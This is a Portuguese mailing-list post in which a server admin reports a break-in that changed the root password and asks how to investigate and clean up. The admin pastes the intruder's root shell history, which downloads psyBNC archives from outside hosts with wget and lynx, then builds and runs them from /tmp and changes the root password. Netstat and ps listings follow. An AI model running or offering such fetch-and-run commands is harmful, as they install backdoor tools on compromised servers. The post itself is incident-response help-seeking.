Re: Invadiram servidor e trocaram senha root .... O que fazer???
Ola, Muito obrigado a todos que entenderam o meu desespero.
É muito dificil voce convencer os "donos" da rede a liberar um subdominio
pra voce! E eles tem razao! As brechas pra invasao sao potencializadas
nesses casos! Dado isso, o meu desespero em resolver por aqui: na lista!
Bem, verificando o /var/log, vi que existem ziloes de arquivos la. Presumo
que o dito cujo nao deletou nada!
Tambem vi que o cara deu os seguintes comandos no .bash_history do root
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar
lynx -source http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar >
psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz
lynx -source http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz > psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz;
lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz >
psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz >
psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source http://xpl.netmisphere2.com/psybnc.tar.tar > psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin
Alem disso, o comando netstat -pantu mostra
Conexões Internet Ativas (servidores e estabelecidas)
Proto Recv-Q Send-Q Endereço Local Endereço Remoto Estado
PID/Program name
tcp 0 0 0.0.0.0:37 0.0.0.0:* OUÇA
355/inetd
tcp 0 0 0.0.0.0:9 0.0.0.0:* OUÇA
355/inetd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* OUÇA
416/mysqld
tcp 0 0 0.0.0.0:13 0.0.0.0:* OUÇA
355/inetd
tcp 0 0 0.0.0.0:80 0.0.0.0:* OUÇA
590/apache
tcp 0 0 0.0.0.0:22 0.0.0.0:* OUÇA
576/sshd
tcp 0 0 0.0.0.0:25 0.0.0.0:* OUÇA
551/master
udp 0 0 0.0.0.0:9 0.0.0.0:*
355/inetd
Outra coisa seria o comando ps aux que mostra:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 1.3 1492 484 ? S 17:43 0:05 init [2]
root 2 0.0 0.0 0 0 ? S 17:43 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SN 17:43 0:00
[ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? S 17:43 0:00 [kswapd]
root 5 0.0 0.0 0 0 ? S 17:43 0:00 [bdflush]
root 6 0.0 0.0 0 0 ? S 17:43 0:00 [kupdated]
root 7 0.0 0.0 0 0 ? S 17:43 0:00 [i2oevtd]
root 9 0.0 0.0 0 0 ? S 17:43 0:00 [kreiserfsd]
root 342 0.0 1.6 1544 588 ? Ss 17:45 0:01 /sbin/syslogd
root 345 0.0 1.3 2216 504 ? Ss 17:45 0:01 /sbin/klogd
root 355 0.0 1.2 1520 456 ? Ss 17:45 0:00
/usr/sbin/inetd
root 370 0.0 2.8 2496 1044 ? S 17:45 0:00 /bin/sh
/usr/bin/mysqld_safe
root 415 0.0 2.8 2496 1048 ? S 17:45 0:00 /bin/sh
/usr/bin/mysqld_safe
mysql 416 0.0 15.8 73584 5736 ? S 17:45 0:01
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
root 417 0.0 1.3 1476 488 ? S 17:45 0:00 logger -p
daemon.err -t mysqld_safe -i -t mysqld
mysql 420 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 421 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 422 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 423 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 424 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 425 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 426 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 427 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
mysql 428 0.0 15.8 73584 5736 ? S 17:45 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
root 551 0.0 3.1 2956 1140 ? Ss 17:45 0:00
/usr/lib/postfix/master
postfix 556 0.0 3.0 2964 1096 ? S 17:45 0:00 pickup -l
-t fifo -u -c
postfix 557 0.0 3.3 2996 1208 ? S 17:45 0:00 qmgr -l -t
fifo -u -c
root 566 0.0 4.3 6736 1588 ? Ss 17:45 0:00
/usr/sbin/saslauthd -a pam
root 567 0.0 4.3 6736 1588 ? S 17:45 0:00
/usr/sbin/saslauthd -a pam
root 568 0.0 4.3 6736 1588 ? S 17:45 0:00
/usr/sbin/saslauthd -a pam
root 569 0.0 4.3 6736 1588 ? S 17:45 0:00
/usr/sbin/saslauthd -a pam
root 570 0.0 4.3 6736 1588 ? S 17:45 0:00
/usr/sbin/saslauthd -a pam
root 576 0.0 3.8 3648 1380 ? Ss 17:45 0:00 /usr/sbin/sshd
daemon 580 0.0 1.6 1672 616 ? Ss 17:45 0:00 /usr/sbin/atd
root 583 0.0 2.2 1756 820 ? Ss 17:45 0:00 /usr/sbin/cron
root 590 0.0 13.2 13096 4812 ? S 17:45 0:00
/usr/sbin/apache
root 596 0.0 4.7 4112 1708 tty1 Ss 17:45 0:01 -bash
root 597 0.0 1.3 1484 476 tty2 Ss+ 17:45 0:00 /sbin/getty
38400 tty2
root 598 0.0 1.3 1484 476 tty3 Ss+ 17:45 0:00 /sbin/getty
38400 tty3
root 599 0.0 1.3 1484 476 tty4 Ss+ 17:45 0:00 /sbin/getty
38400 tty4
root 600 0.0 1.3 1484 476 tty5 Ss+ 17:45 0:00 /sbin/getty
38400 tty5
root 601 0.0 1.3 1484 476 tty6 Ss+ 17:45 0:00 /sbin/getty
38400 tty6
www-data 602 0.0 9.3 13096 3380 ? S 17:45 0:00
/usr/sbin/apache
www-data 603 0.0 9.3 13096 3380 ? S 17:45 0:00
/usr/sbin/apache
www-data 604 0.0 9.3 13096 3380 ? S 17:45 0:00
/usr/sbin/apache
www-data 605 0.0 9.3 13096 3380 ? S 17:45 0:00
/usr/sbin/apache
www-data 606 0.0 9.3 13096 3380 ? S 17:45 0:00
/usr/sbin/apache
root 921 0.0 2.3 2480 864 tty1 R+ 19:03 0:00 ps aux
Eu virei o google de cabeca pra baixo e vi que esse y2kupdate e algo do
irq! Mas, eu gostaria de saber como descobrir como ele me invadiu? Pois
esse psyBNC e algo como um script irq, mas eu nao vi o egg rodando.
Alguem que teria vivido ou presenciado algo parecido poderia me dizer o
caminho das pedras para limpar o meu sistema, e me precaver, sem uma
formatacao do sistema?
A principio os logs estao todos la e nao deu um rm em tudo!!!!
Obrigado
Reply to: